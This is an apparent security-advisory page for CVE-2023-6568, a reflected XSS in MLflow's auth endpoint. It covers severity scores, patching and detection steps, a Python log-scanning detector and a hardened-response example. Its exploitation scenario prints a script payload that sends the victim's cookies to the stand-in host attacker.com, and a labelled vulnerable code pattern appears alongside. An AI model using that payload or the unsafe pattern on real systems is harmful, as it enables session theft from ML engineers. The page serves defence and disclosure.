CVE-2023-6568: MLflow: reflected XSS via Content-Type header injection

Severity: MEDIUM | PoC available | Nuclei template available
Published December 7, 2023
CISO Take

Patch MLflow immediately if your MLOps team runs it with authentication enabled — an unauthenticated attacker can steal session tokens from data scientists and ML engineers by sending a single crafted link. Successful exploitation grants access to training pipelines, model artifacts, and experiment data, with potential pivot to connected cloud infrastructure. Network-restrict MLflow to internal networks or VPN if patching is delayed.

What is the risk?

CVSS 6.1 understates operational risk in ML environments. The attack requires no authentication and has low complexity — only victim interaction separates an attacker from ML platform access. The Changed scope in the CVSS vector signals cross-boundary impact. Risk is significantly elevated where MLflow is internet-exposed, where ML engineers hold broad data or cloud IAM permissions, or where MLflow credentials are shared/reused across systems.

What systems are affected?

Package | Ecosystem | Vulnerable Range | Patched
MLflow  | pip       |                  | No patch

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1: 6.1 / 10
EPSS: 1.6% chance of exploitation in 30 days (higher than 73% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
Public PoC indexed (trickest/cve)
Nuclei detection template available
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): Required
S (Scope): Changed
C (Confidentiality): Low
I (Integrity): Low
A (Availability): None

What should I do?

5 steps
  1. Patch: Upgrade to an MLflow version including commit 28ff3f94 or later — verify via `pip show mlflow` and compare against the GitHub advisory.

  2. Network isolation: Restrict MLflow UI and API to internal networks or VPN; remove any public internet exposure immediately.

  3. Detection: Alert on requests to the MLflow auth endpoint with non-standard or anomalously long Content-Type headers.

  4. Credential rotation: Rotate all MLflow service account tokens and user credentials post-patch.

  5. CSP enforcement: Validate that Content-Security-Policy headers are configured on MLflow to limit the impact of a successful XSS.
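To make step 3 concrete, here is an added detection example (written for this page, not taken from it or from the MLflow project) that scans constructed request-log lines and flags auth-endpoint requests whose Content-Type header is overlong, not a well-formed media type, or not one of the media types a real client sends. The auth path prefix, the allowlist, the log format and the sample lines are all assumptions to adjust per deployment.

```python
import re
from urllib.parse import urlsplit

# Assumption (adjust per deployment): MLflow's basic-auth API paths start with this prefix.
AUTH_PATH_PREFIXES = ("/api/2.0/mlflow/users",)
# Media types a legitimate client sends to the auth API; anything else is worth a look.
ALLOWED_MEDIA_TYPES = {"application/json", "application/x-www-form-urlencoded"}
MAX_CONTENT_TYPE_LEN = 64  # a sane Content-Type is short; injected payloads are not
# RFC 7231 shape: type/subtype, then optional ;name=value parameters. Markup such as
# <, > or a stray quote outside a quoted-string cannot match, so injected script is rejected.
MEDIA_TYPE_RE = re.compile(
    r'^[\w!#$&^.+-]+/[\w!#$&^.+-]+(\s*;\s*[\w.-]+=("[^"]*"|[\w.-]+))*\s*$')
# Constructed log format for this example (not a real MLflow or gunicorn format):
#   METHOD PATH "Content-Type header value"
LOG_LINE_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<path>\S+) "(?P<ctype>[^"]*)"$')

def check_content_type(path: str, ctype: str) -> tuple[bool, str]:
    """Return (alert, reason) for one request; only auth-endpoint requests are judged."""
    if not urlsplit(path).path.startswith(AUTH_PATH_PREFIXES):
        return False, "not an auth endpoint"
    if len(ctype) > MAX_CONTENT_TYPE_LEN:
        return True, "Content-Type longer than %d bytes" % MAX_CONTENT_TYPE_LEN
    if not MEDIA_TYPE_RE.match(ctype):
        return True, "Content-Type is not a well-formed media type"
    media_type = ctype.split(";", 1)[0].strip().lower()
    if media_type not in ALLOWED_MEDIA_TYPES:
        return True, "unexpected media type " + media_type
    return False, "ok"

def scan_log(lines):
    """Return (path, content_type, reason) for every line that should raise an alert."""
    alerts = []
    for line in lines:
        m = LOG_LINE_RE.match(line.strip())
        if m:  # lines that do not parse are skipped, not alerted on
            alert, reason = check_content_type(m["path"], m["ctype"])
            if alert:
                alerts.append((m["path"], m["ctype"], reason))
    return alerts

# Constructed sample traffic: two benign auth calls, one benign non-auth call with an odd
# header, then an injected-markup header and an overlong header against the auth API.
SAMPLE_LOG = [
    'POST /api/2.0/mlflow/users/create "application/json"',
    'POST /api/2.0/mlflow/users/update-password "application/json; charset=utf-8"',
    'POST /api/2.0/mlflow/experiments/search "text/html;<b>x</b>"',
    'POST /api/2.0/mlflow/users/create "text/html;<script>alert(1)</script>"',
    'POST /api/2.0/mlflow/users/create "application/json;' + "a" * 70 + '"',
]
```

Running `scan_log(SAMPLE_LOG)` yields two alerts (the malformed and the overlong header); the odd header against the non-auth endpoint is deliberately ignored to keep the rule low-noise.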

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.8.4 - Security of AI system development environment
NIST AI RMF
MANAGE 2.4 - Residual risks to AI system operation are mapped and managed
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions


Is CVE-2023-6568 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-6568, increasing the risk of exploitation.

How to fix CVE-2023-6568?

  1. Patch: Upgrade to an MLflow version including commit 28ff3f94 or later — verify via `pip show mlflow` and compare against the GitHub advisory.

  2. Network isolation: Restrict MLflow UI and API to internal networks or VPN; remove any public internet exposure immediately.

  3. Detection: Alert on requests to the MLflow auth endpoint with non-standard or anomalously long Content-Type headers.

  4. Credential rotation: Rotate all MLflow service account tokens and user credentials post-patch.

  5. CSP enforcement: Validate that Content-Security-Policy headers are configured on MLflow to limit the impact of a successful XSS.

What systems are affected by CVE-2023-6568?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms, model serving, training pipelines, experiment tracking.

What is the CVSS score for CVE-2023-6568?

CVE-2023-6568 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 1.65%.

What is the AI security impact?

Affected AI Architectures

MLOps platforms, model serving, training pipelines, experiment tracking

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.8.4
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

A reflected Cross-Site Scripting (XSS) vulnerability exists in the mlflow/mlflow repository, specifically within the handling of the Content-Type header in POST requests. An attacker can inject malicious JavaScript code into the Content-Type header, which is then improperly reflected back to the user without adequate sanitization or escaping, leading to arbitrary JavaScript execution in the context of the victim's browser. The vulnerability is present in the mlflow/server/auth/__init__.py file, where the user-supplied Content-Type header is directly injected into a Python formatted string and returned to the user, facilitating the XSS attack.
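As an added illustration (constructed for this page; neither MLflow's actual code nor its fix), the unsafe pattern the advisory describes next to a hardened response that never lets the raw header value reach the browser as HTML. Function and constant names are assumptions.

```python
import html
import json
import re

# Tokens permitted in a media type per RFC 7231 (type/subtype only; parameters are dropped).
TOKEN_RE = re.compile(r"^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+$")

def unsafe_error_page(content_type: str) -> tuple[str, dict]:
    """Constructed illustration of the pattern the advisory describes, NOT MLflow's code:
    the raw header value is interpolated into a format string that is served as HTML,
    so any markup in the header is rendered by the victim's browser (CWE-79)."""
    body = f"<html><body>Invalid Content-Type: {content_type}</body></html>"
    return body, {"Content-Type": "text/html"}

def safe_error_response(content_type: str) -> tuple[str, dict]:
    """Hardened form with three independent layers:
    1. reduce the untrusted value to a validated media type (the parameter part is
       where a payload hides), replacing anything unparseable with a fixed string;
    2. HTML-escape the value anyway, so a regression in layer 1 cannot inject markup;
    3. serve JSON with nosniff, so a browser never interprets the body as a page."""
    media_type = content_type.split(";", 1)[0].strip()
    if not TOKEN_RE.match(media_type):
        media_type = "unparseable"
    body = json.dumps({"error": "Unsupported Content-Type",
                       "received": html.escape(media_type, quote=True)})
    return body, {"Content-Type": "application/json",
                  "X-Content-Type-Options": "nosniff"}

def reflected_value(content_type: str) -> str:
    """What the hardened response actually echoes back for a given header."""
    return json.loads(safe_error_response(content_type)[0])["received"]

def renders_as_script(body: str, headers: dict) -> bool:
    """True when the body is served as HTML and still carries raw <script> markup."""
    return headers["Content-Type"].startswith("text/html") and "<script" in body.lower()

PAYLOAD = "text/html;<script>alert(1)</script>"  # constructed, benign marker payload
```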

Exploitation Scenario

An attacker targeting an ML team discovers their MLflow instance via Shodan or internal recon. They craft a POST request URL to the MLflow auth endpoint embedding JavaScript in the Content-Type header — e.g., `text/html;<script>fetch('https://attacker.com/?c='+encodeURIComponent(document.cookie))</script>`. The attacker sends a phishing email to a data scientist with a link triggering this request. When the victim clicks, MLflow reflects the malicious Content-Type back unescaped, the script executes in the victim's browser, and their session token is silently exfiltrated. The attacker uses the stolen token to download production model artifacts, inspect training data references, or pivot to connected cloud storage buckets using credentials stored in MLflow's artifact backend configuration.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, Cascading Style Sheets and style property, etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Timeline

Published
December 7, 2023
Last Modified
November 21, 2024
First Seen
December 7, 2023

Scanner Template Available

A Nuclei vulnerability scanner template exists for this CVE. You can scan your infrastructure for this vulnerability immediately.

View template on GitHub
nuclei -t http/cves/2023/CVE-2023-6568.yaml -u https://target.example.com
